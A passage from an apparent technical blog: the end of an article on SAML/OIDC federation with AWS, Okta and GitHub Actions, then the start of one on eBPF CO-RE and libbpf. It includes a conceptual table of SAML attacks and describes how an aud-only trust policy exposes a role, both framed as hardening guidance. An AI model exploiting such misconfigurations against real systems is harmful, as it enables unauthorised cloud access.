      <saml:AttributeValue>
        arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider
      </saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>

  <!-- Critical: time bounds on this assertion -->
  <saml:Conditions NotBefore="2026-04-11T09:00:00Z" NotOnOrAfter="2026-04-11T09:05:00Z">
    <saml:AudienceRestriction>
      <!-- Critical: this assertion is ONLY valid for AWS -->
      <saml:Audience>https://signin.aws.amazon.com/saml</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>

  <ds:Signature>... RSA-SHA256 signature over the above ...</ds:Signature>
</saml:Assertion>

The Audience restriction and the NotOnOrAfter timestamp are two of the most security-critical fields. The audience ensures this assertion can’t be reused for a different SP. The timestamp ensures it can’t be replayed after expiry.
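Those two checks can be sketched in a few lines of Python against a stripped-down assertion. Namespace prefixes and signature verification are deliberately omitted here — signature handling must come from a vetted SAML library, never hand-rolled:

```python
# Sketch of the Audience and NotOnOrAfter checks on a SAML assertion.
# Namespace prefixes stripped for brevity; NOT a substitute for a real
# SAML library, which must also verify the XML signature.
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

ASSERTION = """<Assertion>
  <Conditions NotBefore="2026-04-11T09:00:00Z" NotOnOrAfter="2026-04-11T09:05:00Z">
    <AudienceRestriction>
      <Audience>https://signin.aws.amazon.com/saml</Audience>
    </AudienceRestriction>
  </Conditions>
</Assertion>"""

def check_conditions(xml_text, my_entity_id, now):
    cond = ET.fromstring(xml_text).find(".//Conditions")
    expires = datetime.fromisoformat(
        cond.get("NotOnOrAfter").replace("Z", "+00:00"))
    if now >= expires:
        return False                        # replay after expiry
    audience = cond.find(".//Audience").text
    return audience == my_entity_id         # assertion minted for another SP?

now = datetime(2026, 4, 11, 9, 2, tzinfo=timezone.utc)
print(check_conditions(ASSERTION, "https://signin.aws.amazon.com/saml", now))  # True
print(check_conditions(ASSERTION, "https://other-sp.example.com", now))        # False
```

Skipping either check turns a single intercepted assertion into a reusable, transferable credential.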

Setting Up SAML Federation with AWS

# Register Okta as a SAML provider in AWS IAM
aws iam create-saml-provider \
  --saml-metadata-document file://okta-metadata.xml \
  --name OktaProvider

# Create the IAM role that federated users will assume
aws iam create-role \
  --role-name EngineerRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:saml-provider/OktaProvider"
      },
      "Action": "sts:AssumeRoleWithSAML",
      "Condition": {
        "StringEquals": {
          "SAML:aud": "https://signin.aws.amazon.com/saml"
        }
      }
    }]
  }'

# In Okta: configure the AWS Account Federation (SAML) app
# Attribute mapping: https://aws.amazon.com/SAML/Attributes/Role
# Value: arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider

# Set maximum session duration (8 hours is reasonable for human access)
aws iam update-role \
  --role-name EngineerRole \
  --max-session-duration 28800

SAML Attack Surface

| Attack | What It Does | Why It Works | Prevention |
|---|---|---|---|
| XML Signature Wrapping (XSW) | Attacker inserts a malicious assertion, wraps it around the legitimate signed one; some SPs validate the wrong element | SAML’s XML structure is complex; naive signature validation checks the signed element, not the element the SP reads | Use a vetted SAML library — never hand-roll parsing |
| Assertion replay | Steal a valid assertion (e.g., via network intercept) and replay it before NotOnOrAfter | If the SP doesn’t track used assertion IDs, the same assertion can be used multiple times | Short expiry; SP tracks seen assertion IDs |
| Audience bypass | SP doesn’t verify the Audience field | An assertion issued for SP A can be used at SP B | Always validate Audience matches your SP entity ID |

XML Signature Wrapping is the most interesting attack historically — it was how security researchers demonstrated that SAML implementations at AWS, Google, and others could be bypassed before vendors patched their libraries. The lesson: SAML is complex enough that rolling your own parser is asking for a vulnerability.
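
The replay defense from the table — "SP tracks seen assertion IDs" — is conceptually a cache keyed by assertion ID with entries that live until the assertion's NotOnOrAfter passes. A minimal in-memory sketch (a clustered SP would need a shared store such as Redis so every node sees the same "already used" set):

```python
import time

class ReplayCache:
    """Track consumed assertion IDs until their NotOnOrAfter passes.
    In-memory sketch for a single-node SP."""
    def __init__(self):
        self._seen = {}  # assertion_id -> expiry (unix time)

    def accept(self, assertion_id: str, not_on_or_after: float, now: float = None) -> bool:
        now = time.time() if now is None else now
        # Prune entries whose assertions have expired anyway
        self._seen = {i: exp for i, exp in self._seen.items() if exp > now}
        if assertion_id in self._seen:
            return False          # replay — this assertion was already consumed
        if now >= not_on_or_after:
            return False          # expired assertion
        self._seen[assertion_id] = not_on_or_after
        return True               # first use, inside the validity window

cache = ReplayCache()
print(cache.accept("_a1b2c3", not_on_or_after=1000.0, now=900.0))  # True (first use)
print(cache.accept("_a1b2c3", not_on_or_after=1000.0, now=950.0))  # False (replay)
```

Short assertion lifetimes keep this cache small: you only have to remember an ID for the few minutes the assertion is valid.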


OpenID Connect (OIDC) — The Modern Protocol

OIDC is JSON-based, REST-native, and designed for the web and API-first world. Built on top of OAuth 2.0, it’s the protocol behind “Sign in with Google,” GitHub’s OIDC tokens for Actions, and workload identity federation across cloud providers.

Token Anatomy

An OIDC ID Token is a JWT — three base64-encoded parts separated by dots:

Header.Payload.Signature

Header:
{
  "alg": "RS256",           ← signing algorithm
  "kid": "key-id-123"       ← which key signed this (for JWKS rotation)
}

Payload (the claims):
{
  "iss": "https://accounts.google.com",         ← who issued this token
  "sub": "108378629573454321234",               ← stable user identifier (not email)
  "aud": "my-app-client-id",                   ← who this token is for
  "exp": 1749600000,                           ← expires at (Unix timestamp)
  "iat": 1749596400,                           ← issued at
  "email": "[email protected]",
  "email_verified": true,
  "hd": "company.com"                          ← hosted domain (Google Workspace)
}

Signature: RSA-SHA256(base64(header) + "." + base64(payload), idp_private_key)

The relying party (your application, or AWS STS) validates the signature using the IdP’s public keys — available at the JWKS endpoint (/.well-known/jwks.json). The signature verification proves the token was issued by the expected IdP and hasn’t been tampered with since.
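
To make the three-part structure concrete, here is a small sketch that splits a JWT and decodes its header and claims *without* verifying the signature — useful only for debugging, since nothing here is trustworthy until a JWT library has verified the signature against the IdP's JWKS. The token is hand-built for the demo; its signature part is a placeholder:

```python
import base64, json

def b64url_decode(part: str) -> bytes:
    # JWT uses unpadded base64url; restore padding before decoding
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def peek_jwt(token: str):
    """Split a JWT into (header, claims) WITHOUT verifying the signature.
    Debugging aid only — never trust these values until the signature
    has been verified against the IdP's JWKS."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def b64url(obj) -> str:
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()

# Hand-built demo token — the signature segment is fake
token = ".".join([
    b64url({"alg": "RS256", "kid": "key-id-123"}),
    b64url({"iss": "https://accounts.google.com", "aud": "my-app-client-id", "exp": 1749600000}),
    "fake-signature",
])

header, claims = peek_jwt(token)
print(header["kid"])                 # key-id-123 — selects which JWKS key to fetch
print(claims["iss"], claims["aud"])
```

The `kid` in the header is what makes key rotation work: the verifier fetches the JWKS, finds the key whose `kid` matches, and verifies against that key.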

The Full OIDC Token Exchange (GitHub Actions → AWS)

# GitHub Actions automatically provides an OIDC token in the runner environment
# The token contains: iss=token.actions.githubusercontent.com, repo, ref, sha, run_id, etc.

# Step 1: Fetch the OIDC token from GitHub's token service
TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')

# Step 2: Present to AWS STS for exchange
aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::123456789012:role/GitHubActionsRole \
  --role-session-name github-deploy \
  --web-identity-token "${TOKEN}"

# STS performs these validations:
# 1. Fetch GitHub's JWKS: https://token.actions.githubusercontent.com/.well-known/jwks
# 2. Verify signature is valid
# 3. Verify iss = "token.actions.githubusercontent.com" (matches OIDC provider)
# 4. Verify aud = "sts.amazonaws.com"
# 5. Verify sub matches the trust policy condition
# 6. Verify exp is in the future

The trust policy condition on the IAM role is what prevents any GitHub repository from assuming this role:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
        "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
      }
    }
  }]
}

The sub condition is the security boundary. repo:my-org/my-repo:ref:refs/heads/main means: only runs triggered from the main branch of my-org/my-repo can assume this role. A pull request from a fork, a run from a different repo, or a run from a different branch — all get a different sub claim and the assumption fails.

I’ve reviewed trust policies that omit the sub condition and just check aud. That means any GitHub Actions workflow — in any repository, owned by anyone — can assume that role. That’s not a theoretical misconfiguration: public GitHub repositories exist, and anyone can run workflows from them.
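
The difference between the two trust policies comes down to a simple exact-match evaluation. This toy model covers only the StringEquals case (real IAM also supports StringLike, wildcards, and more) but shows why dropping the sub pin opens the role to every repository:

```python
def can_assume(conditions: dict, token_claims: dict) -> bool:
    """Sketch of STS evaluating a trust policy's StringEquals block
    against an OIDC token's claims — exact-match conditions only."""
    return all(token_claims.get(key) == expected
               for key, expected in conditions.items())

strict = {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
    "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main",
}
aud_only = {"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"}

attacker = {   # token from a workflow in someone else's repository
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
    "token.actions.githubusercontent.com:sub": "repo:attacker/evil:ref:refs/heads/main",
}

print(can_assume(strict, attacker))    # False — the sub pin blocks the foreign repo
print(can_assume(aud_only, attacker))  # True  — any GitHub workflow can assume the role
```

Every OIDC token GitHub issues carries `aud: sts.amazonaws.com` when requested for AWS — so checking only aud distinguishes nothing.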

OIDC Validation Checklist

Every application that validates OIDC tokens must check all of these:

✓ Signature valid (using IdP's JWKS endpoint — not a hardcoded key)
✓ iss matches the expected IdP URL
✓ aud matches your application's client ID (not just "any audience")
✓ exp is in the future
✓ nbf (not before), if present, is in the past
✓ iat is recent (within your clock skew tolerance)
✓ For workload identity: sub is pinned to the specific workload

Skipping aud validation is the most common mistake. A token issued for application A with aud: app-a-client-id should not be accepted by application B. Without audience validation, any application in your system that can obtain a token for the IdP can reuse it at any other application. Libraries like python-jose and jsonwebtoken validate aud by default — but they need to be configured with the expected audience value.
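
The checklist translates into a short validation function. This sketch assumes the signature has *already* been verified by a JWT library against the IdP's JWKS — it covers only the claim checks, and the skew tolerance value is an illustrative choice:

```python
import time

def validate_claims(claims: dict, expected_iss: str, expected_aud: str,
                    now: float = None, skew: int = 300) -> list:
    """Apply the claim checklist to a signature-verified claim set.
    Returns a list of failures; an empty list means the token passes."""
    now = time.time() if now is None else now
    failures = []
    if claims.get("iss") != expected_iss:
        failures.append("iss mismatch")
    if claims.get("aud") != expected_aud:
        failures.append("aud mismatch")
    if claims.get("exp", 0) <= now:
        failures.append("expired")
    if "nbf" in claims and claims["nbf"] > now + skew:
        failures.append("not yet valid")
    if "iat" in claims and claims["iat"] > now + skew:
        failures.append("issued in the future")
    return failures

good = {"iss": "https://accounts.google.com", "aud": "my-app-client-id",
        "exp": 2000, "iat": 900}
stolen = dict(good, aud="app-a-client-id")   # token minted for a different app

print(validate_claims(good, "https://accounts.google.com", "my-app-client-id", now=1000))    # []
print(validate_claims(stolen, "https://accounts.google.com", "my-app-client-id", now=1000))  # ['aud mismatch']
```

The second call is the cross-application reuse scenario from the paragraph above: everything about the token is valid except who it was issued for.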


Enterprise Federation Patterns

Multi-Account AWS with IAM Identity Center + Okta

The pattern I deploy in every multi-account AWS environment:

Okta (IdP)
  └── IAM Identity Center
        ├── Account: prod     → Permission Sets: ReadOnly, DevOps
        ├── Account: staging  → Permission Sets: Developer  
        ├── Account: shared   → Permission Sets: NetworkAdmin, SecurityAudit
        └── Account: sandbox  → Permission Sets: Admin (sandbox only)

# Engineers access accounts through Identity Center portal
aws configure sso
# Prompts: SSO start URL, region, account, role

aws sso login --profile prod-readonly

# List available accounts and roles (useful for tooling and scripts)
aws sso list-accounts --access-token "${TOKEN}"
aws sso list-account-roles --access-token "${TOKEN}" --account-id "${ACCOUNT_ID}"

# Get temporary credentials for a specific account/role
aws sso get-role-credentials \
  --account-id "${ACCOUNT_ID}" \
  --role-name ReadOnly \
  --access-token "${TOKEN}"

When an engineer is offboarded from Okta, they lose access to every AWS account immediately. No individual IAM user deletion across 20 accounts. No access key hunting. One action in Okta, complete revocation.

Just-in-Time (JIT) Provisioning

Rather than creating user accounts in every downstream system ahead of time, JIT provisioning creates accounts on first login:

  1. User authenticates to IdP
  2. SAML/OIDC assertion includes group memberships and attributes
  3. SP receives assertion, checks if a user account exists for this sub
  4. If not: create the account with attributes from the assertion
  5. Grant access based on group claims
  6. On subsequent logins: update the account’s attributes if claims changed

The security property: when a user is disabled in the IdP, their account in downstream systems becomes inaccessible even if the account object still exists — there’s nothing to log in with. A JIT account orphaned by IdP deletion is an inactive shell: no credential exists for it, so it poses no standing authentication risk.
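
The six-step flow above can be sketched as a create-or-update keyed on the assertion's sub. Field names and the in-memory store are illustrative:

```python
class ServiceProvider:
    """JIT provisioning sketch: accounts are created or updated from
    assertion claims at login time, keyed by the stable 'sub' identifier."""
    def __init__(self):
        self.accounts = {}  # sub -> {"email": ..., "groups": [...]}

    def login(self, assertion: dict) -> dict:
        sub = assertion["sub"]
        if sub not in self.accounts:
            # Step 4: first login — create the account from the assertion
            self.accounts[sub] = {"email": assertion["email"],
                                  "groups": list(assertion["groups"])}
        else:
            # Step 6: subsequent login — sync attributes if claims changed
            self.accounts[sub]["groups"] = list(assertion["groups"])
        return self.accounts[sub]

sp = ServiceProvider()
sp.login({"sub": "108378", "email": "alice@company.com", "groups": ["engineers"]})
later = sp.login({"sub": "108378", "email": "alice@company.com", "groups": ["engineers", "oncall"]})
print(later["groups"])   # ['engineers', 'oncall'] — updated, not duplicated
print(len(sp.accounts))  # 1 — same sub, same account
```

Keying on sub rather than email matters: emails change, sub does not, and a reassigned email address must never inherit a previous user's account.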


The IdP Is the Trust Anchor — Protect It Accordingly

The entire security of a federated system is bounded by the security of the IdP. If an attacker can log into Okta as an admin, they can issue valid SAML assertions for any user, for any role, to any SP that trusts Okta. Every downstream system is compromised simultaneously.

This is not theoretical. In the 2023 Caesars and MGM Resorts attacks, initial access was achieved through social engineering against identity provider support — not through technical exploitation of cloud infrastructure. Once identity infrastructure is compromised, everything downstream follows.

What this means practically:

  • MFA for all IdP admin accounts — hardware FIDO2 keys, not TOTP. TOTP codes can be phished in real-time. Hardware keys cannot.
  • PIM / JIT access for IdP configuration changes — no standing admin access
  • Separate monitoring and alerting for IdP admin activity
  • Audit who can modify SAML/OIDC configurations and attribute mappings in the IdP — these are the levers for privilege escalation
  • Narrow audience restrictions — configure which SPs can receive assertions; don’t create a wildcard IdP configuration that serves all SPs

Conditional Access — Adding Context to Federation

Modern IdPs support Conditional Access policies that restrict when assertions are issued:

// Entra ID Conditional Access: require MFA + compliant device for AWS access
{
  "conditions": {
    "applications": {
      "includeApplications": ["AWS-Application-ID-in-Entra"]
    },
    "users": {
      "includeGroups": ["all-employees"]
    },
    "locations": {
      "excludeLocations": ["NamedLocation-CorporateNetwork"]
    }
  },
  "grantControls": {
    "operator": "AND",
    "builtInControls": ["mfa", "compliantDevice"]
  }
}

This policy: when an employee accesses AWS from outside the corporate network, they must use MFA on a device that MDM has verified as compliant. From inside the corporate network — the excluded named location — this particular policy does not apply at all, so sign-ins from there must be gated by other policies or controls.

Conditional Access is how you move beyond “authenticated to IdP” as the only gate. Device health, network location, risk score — these become inputs to the access decision.
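
The decision logic behind a policy like the one above can be modeled in a few lines. This is a simplified sketch, assuming the common semantics that an excluded named location takes the sign-in out of the policy's scope; field names mirror the Entra ID JSON, and the location/context values are invented:

```python
def evaluate(policy: dict, context: dict) -> bool:
    """Simplified Conditional Access decision: outside the excluded
    location, ALL grant controls must be satisfied ('AND' operator)."""
    excluded = policy["conditions"]["locations"]["excludeLocations"]
    if context["location"] in excluded:
        return True  # named-location exclusion: this policy does not gate the sign-in
    controls = policy["grantControls"]["builtInControls"]
    return all(context.get(c, False) for c in controls)

policy = {
    "conditions": {"locations": {"excludeLocations": ["NamedLocation-CorporateNetwork"]}},
    "grantControls": {"operator": "AND", "builtInControls": ["mfa", "compliantDevice"]},
}

office = {"location": "NamedLocation-CorporateNetwork"}
cafe_no_mdm = {"location": "CoffeeShopWifi", "mfa": True, "compliantDevice": False}
cafe_ok = {"location": "CoffeeShopWifi", "mfa": True, "compliantDevice": True}

print(evaluate(policy, office))       # True  — excluded location, policy out of scope
print(evaluate(policy, cafe_no_mdm))  # False — device not MDM-compliant
print(evaluate(policy, cafe_ok))      # True  — both grant controls satisfied
```

Each context key (device compliance, MFA state, location) is an input signal — exactly the "are you in an appropriate context right now" question Conditional Access adds on top of authentication.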


Framework Alignment

| Framework | Reference | What It Covers Here |
|-----------|-----------|---------------------|
| CISSP | Domain 5 — Identity and Access Management | Federation is the mechanism for extending identity trust across organizational boundaries |
| CISSP | Domain 3 — Security Architecture | Trust relationships must be explicitly designed; overly broad federation trust is an architectural failure |
| ISO 27001:2022 | 5.19 Information security in supplier relationships | Federation with third-party IdPs and SPs establishes a cross-organizational trust boundary that must be governed |
| ISO 27001:2022 | 8.5 Secure authentication | SAML and OIDC are the secure authentication protocols for federated access — token validation requirements |
| ISO 27001:2022 | 5.17 Authentication information | Credential lifecycle in federated systems — no passwords distributed to SPs; IdP manages authentication |
| SOC 2 | CC6.1 | Federated identity is the access control mechanism for human access to cloud environments |
| SOC 2 | CC6.6 | Logical access from outside system boundaries — federation with external IdPs and partner organizations |

Key Takeaways

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t need to manage them independently
  • SAML is XML-based, browser-oriented, widely supported for enterprise SSO; OIDC is JWT-based, API-friendly, the protocol for modern workload identity and consumer SSO
  • In OIDC, the sub condition in trust policies is what prevents any workload from assuming any role — omitting it is a critical misconfiguration
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but they need correct configuration
  • The IdP is the trust anchor — its security posture bounds the security of every system that trusts it. Treat IdP admin access with the same controls as your most sensitive systems.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

What’s Next

EP11 brings this into Kubernetes — RBAC, service account tokens, and how the Kubernetes authorization layer interacts with cloud IAM. Two separate systems, both requiring security. A gap in either becomes a gap in both.

Next: Kubernetes RBAC and AWS IAM

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

CO-RE and libbpf — Write Once, Run on Any Kernel

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 6
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf


TL;DR

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
    (BTF = BPF Type Format — a compact description of every struct, field, and byte offset in the running kernel, built into the kernel image)
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

eBPF CO-RE (Compile Once, Run Everywhere) solves the kernel portability problem — it is the reason Cilium and Falco survive kernel upgrades without recompilation. Every program in this series so far has quietly assumed that the kernel structs it reads look the same tomorrow as they do today. They don’t. The Linux kernel has no stable ABI for internal data structures. task_struct, sk_buff, sock — the fields eBPF programs read constantly — can shift between patch releases, not just major versions. I learned this the hard way.


Six months after deploying a custom eBPF tracer for a client — it detected specific syscall patterns that Falco’s default ruleset didn’t cover — they ran a routine Ubuntu patch upgrade. Not a major kernel version jump. 5.15.0-89 to 5.15.0-91. Two patch revisions.

The tracer stopped loading. The error was invalid indirect read from stack. I opened the program source: nothing remotely like an indirect read. The program was a straightforward tracepoint handler, maybe 40 lines of C.

Three hours of debugging led to a four-byte offset difference. The struct task_struct had a field alignment change between the two patch versions. My program accessed ->comm at a hardcoded byte offset. On 5.15.0-89 that offset was 0x620. On 5.15.0-91 it was 0x624. The verifier caught the misalignment — correctly — and rejected the program.

I had compiled the eBPF bytecode against a fixed kernel header snapshot. The binary was not portable. Every time the kernel moved a struct field, the tool broke.

CO-RE is the solution to this.

Quick Check: Does Your Cluster Support CO-RE?

Two commands — check whether your nodes have the BTF support that CO-RE tools require:

# SSH into a worker node, then:
ls -la /sys/kernel/btf/vmlinux && echo "BTF available — CO-RE tools will work"

Expected output on a supported node:

-r--r--r-- 1 root root 4956234 Apr 21 00:00 /sys/kernel/btf/vmlinux
BTF available — CO-RE tools will work

If the file is missing: CO-RE tools (Cilium, Falco, Tetragon) will fall back to legacy BCC compilation mode — which requires a full compiler toolchain and kernel headers installed on every node.

# Confirm the kernel was built with BTF enabled
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y  ← required for CO-RE

Common results by platform:
| Platform | BTF available? |
|----------|----------------|
| Ubuntu 20.04+ (kernel 5.4+) | ✓ Yes |
| EKS managed nodes (AL2023) | ✓ Yes |
| GKE managed nodes (kernel 5.10+) | ✓ Yes |
| Amazon Linux 2 (older kernels) | ✗ No — BCC fallback |
| RHEL 7 / CentOS 7 | ✗ No |

Why Kernel Structs Change and Why It Matters

The Linux kernel has no stable ABI for internal data structures. task_struct, sock, sk_buff, file — the structs that eBPF programs read constantly — change between releases.

ABI (Application Binary Interface) is the contract that says a compiled binary built against version N will still work against version N+1 without recompilation. The Linux kernel maintains a stable ABI for syscalls (open(), read(), connect()) but makes no such guarantee for internal structs. Field additions, reordering, alignment changes, struct embedding changes — any of these can land between patch releases, and any program with hardcoded offsets silently breaks. The kernel developers are under no obligation to preserve internal layouts, and they don’t.

Before CO-RE, eBPF programs dealt with this in two ways:

BCC (BPF Compiler Collection) — compile the eBPF C code at runtime on the target host, using that system’s kernel headers. No portability problem because compilation happens on the machine you’re deploying to. Cost: you need a full compiler toolchain, kernel headers, and Python runtime on every production node. Startup time in seconds. Container image size in hundreds of MB. For a security tool that should be lightweight and fast-starting, this is a non-starter.

Per-kernel compiled binaries — ship different builds for each supported kernel version, detect at runtime, load the matching binary. Falco maintained this model for years. The operational overhead is significant: a matrix of kernel × distro × version with separate build and test pipelines for each combination.

CO-RE is the third option. Compile once on a build machine, and let libbpf patch struct field accesses at load time on the target system, using type information embedded in the running kernel.

BTF: The Type System That Makes CO-RE Possible

BTF (BPF Type Format) is compact type debug information embedded directly into the kernel image. Since Linux 5.2, kernels built with CONFIG_DEBUG_INFO_BTF=y expose their full type information at /sys/kernel/btf/vmlinux.

# Verify BTF is available
ls -la /sys/kernel/btf/vmlinux

# Inspect the BTF for a specific struct
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -A 5 'task_struct'

# See the actual field offsets the running kernel uses
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 20 'struct task_struct {'

BTF encodes every struct definition with field names, types, and byte offsets. When libbpf loads an eBPF program compiled with CO-RE relocations, it reads both the BTF the program was compiled against (embedded in the .bpf.o file) and the BTF of the running kernel. If task_struct->comm has moved, libbpf patches the field access instruction before loading the program.

This patching happens at load time, transparently, without modifying the binary you shipped.

CO-RE relocation is the mechanism behind this. When a CO-RE program is compiled, it embeds metadata saying “I need the offset of comm inside task_struct” rather than hardcoding 0x620. At load time, libbpf reads this relocation, looks up the real offset from the running kernel’s BTF, and patches the instruction. For operators: this is why Cilium and Falco survive kernel upgrades without you reinstalling them.
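
A toy model makes the relocation step concrete. The offsets below are invented for illustration (0x620/0x624 echo the story above): the compiled object records *which* field it needs, not a fixed offset, and the loader resolves the offset from the running kernel's BTF:

```python
# What the .bpf.o records: relocations naming (struct, field), not offsets
compiled_relocations = [("task_struct", "comm")]

# Field-offset maps as two different kernels' BTF would describe them
kernel_btf_89 = {("task_struct", "comm"): 0x620}  # 5.15.0-89
kernel_btf_91 = {("task_struct", "comm"): 0x624}  # 5.15.0-91 — field moved

def load(relocations, kernel_btf):
    """Model of the loader: resolve each relocation against the *running*
    kernel's BTF and patch the access to the offset that kernel uses."""
    patched = {}
    for reloc in relocations:
        if reloc not in kernel_btf:
            raise RuntimeError(f"relocation failed: {reloc} not in kernel BTF")
        patched[reloc] = kernel_btf[reloc]
    return patched

print(hex(load(compiled_relocations, kernel_btf_89)[("task_struct", "comm")]))  # 0x620
print(hex(load(compiled_relocations, kernel_btf_91)[("task_struct", "comm")]))  # 0x624
```

Same "binary", two kernels, two different patched offsets — and the hardcoded-offset failure mode simply cannot occur, because no offset exists until load time.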

Most distribution kernels now ship with BTF enabled:

# Ubuntu 20.04+ (kernel 5.4+)
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y

# Check at runtime
stat --format='%s bytes' /sys/kernel/btf/vmlinux
# e.g. 4956234 bytes — size varies by kernel; presence is what matters

Amazon Linux 2023, Ubuntu 22.04, Debian 11+, RHEL 8.2+, and most cloud-provider-managed kernels have BTF. The notable exception: RHEL 7 and Amazon Linux 2 on older kernels.

The CO-RE Toolchain

The build pipeline for a CO-RE eBPF program:

Development machine:
  vmlinux.h (generated from kernel BTF)
       ↓
  myprog.bpf.c ──── clang -target bpf -g ────→ myprog.bpf.o
  (CO-RE relocations embedded in BTF section)
       ↓
  bpftool gen skeleton myprog.bpf.o ─────────→ myprog.skel.h
       ↓
  myprog.c (userspace) ── gcc ──→ myprog
  (statically links libbpf, skeleton handles load/attach/cleanup)

Target machine (any kernel with BTF, 5.4+):
  ./myprog
  ↓ libbpf reads /sys/kernel/btf/vmlinux
  ↓ patches field accesses to match current kernel struct layout
  ↓ verifier validates patched program
  ↓ program loads and runs

One binary. Any supported kernel. No compiler on the target system.

vmlinux.h — One Header to Replace Them All

Before CO-RE, eBPF C programs included dozens of kernel headers — linux/sched.h, linux/net.h, linux/fs.h, linux/socket.h — and they had to match the exact kernel version you were targeting.

vmlinux.h is generated from the BTF of a running kernel. It contains every struct, enum, typedef, and macro definition the kernel exposes through BTF — in a single file, without any compile-time kernel dependency.

# Generate vmlinux.h from the running kernel
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

# Typical size
wc -l vmlinux.h
# 350000+

You commit vmlinux.h to your repository, generated from a representative kernel. CO-RE handles the actual layout differences at load time on whatever kernel you deploy to. The file is large but you only generate it once and update it when you add support for a new kernel generation.

In your eBPF C source:

#include "vmlinux.h"           // replaces all kernel headers
#include <bpf/bpf_helpers.h>   // eBPF helper functions
#include <bpf/bpf_tracing.h>   // tracing macros
#include <bpf/bpf_core_read.h> // CO-RE read macros

How CO-RE Fixes the Offset Problem

The mechanism is worth understanding once, even if you’re not writing eBPF programs.

When a CO-RE eBPF program accesses a kernel struct field, it doesn’t hardcode the byte offset. Instead, it records a relocation — “I need the offset of pid inside task_struct” — in the compiled binary. When libbpf loads the program, it resolves each relocation by looking up the field in the running kernel’s BTF and patches the access instruction to use the correct offset for this specific kernel.

This is why my four-byte problem happened: the tracer I’d compiled wasn’t using CO-RE. It hardcoded 0x620 as the offset of task_struct->comm. When the kernel moved it to 0x624, the program accessed the wrong memory, the verifier caught the misalignment, and the load failed. A CO-RE rewrite would have resolved comm’s offset at load time from BTF and never known the difference.

The relocation model also handles fields that don’t exist on older kernels. If a program accesses a field added in kernel 5.15 and the running kernel is 5.10, libbpf can either skip the access (returning a zero value) or fail the load — depending on how the program marks the field access. This is how tools ship support for features across a kernel version range without separate builds.
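
The optional-field behavior can be sketched the same way. This models the guarded-access pattern (in real CO-RE programs, helpers like bpf_core_field_exists() serve this role); the field sets are illustrative, with "core_cookie" standing in for any field that exists only on newer kernels:

```python
# Illustrative field sets for two kernel versions
kernel_old = {"pid", "comm"}                  # older kernel — field absent
kernel_new = {"pid", "comm", "core_cookie"}   # newer kernel — field present

def read_optional(kernel_fields, field, read_fn, strict=False):
    """Guarded field access: skip the read (default 0) on kernels that
    lack the field, or fail the load if the field is marked required."""
    if field not in kernel_fields:
        if strict:
            raise RuntimeError(f"load failed: kernel lacks field '{field}'")
        return 0
    return read_fn(field)

fake_read = lambda f: 42  # stand-in for the actual guarded kernel read
print(read_optional(kernel_new, "core_cookie", fake_read))  # 42
print(read_optional(kernel_old, "core_cookie", fake_read))  # 0 — skipped, no failure
```

The strict/lenient switch is the author's choice per field access — which is exactly how one binary can span a kernel version range while still hard-failing on fields it genuinely cannot do without.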

What CO-RE Means for Tools You Already Run

This is why you care about CO-RE even if you’re never going to write an eBPF program yourself.

Falco, Cilium, Tetragon, and Pixie all ship as single binaries or container images. You install them on a Ubuntu 22.04 node, a RHEL 9 node, and an Amazon Linux 2023 node — three different kernel versions, three different task_struct layouts — and the same binary works on all of them. Before CO-RE, Falco maintained pre-compiled kernel probes for every supported kernel version in a matrix of distro × kernel × version. The probe list had thousands of entries. A kernel your distro shipped between Falco release cycles meant a gap in coverage until the next release.

With CO-RE, there’s one binary. libbpf reads the running kernel’s BTF at load time, patches the field accesses to match the actual struct layout, and the verifier checks the patched program. The tool vendor doesn’t need to know about your specific kernel. You don’t need to wait for a probe release.

The constraint is BTF availability. Check your nodes:

# Quick check — if this file exists, CO-RE tools work
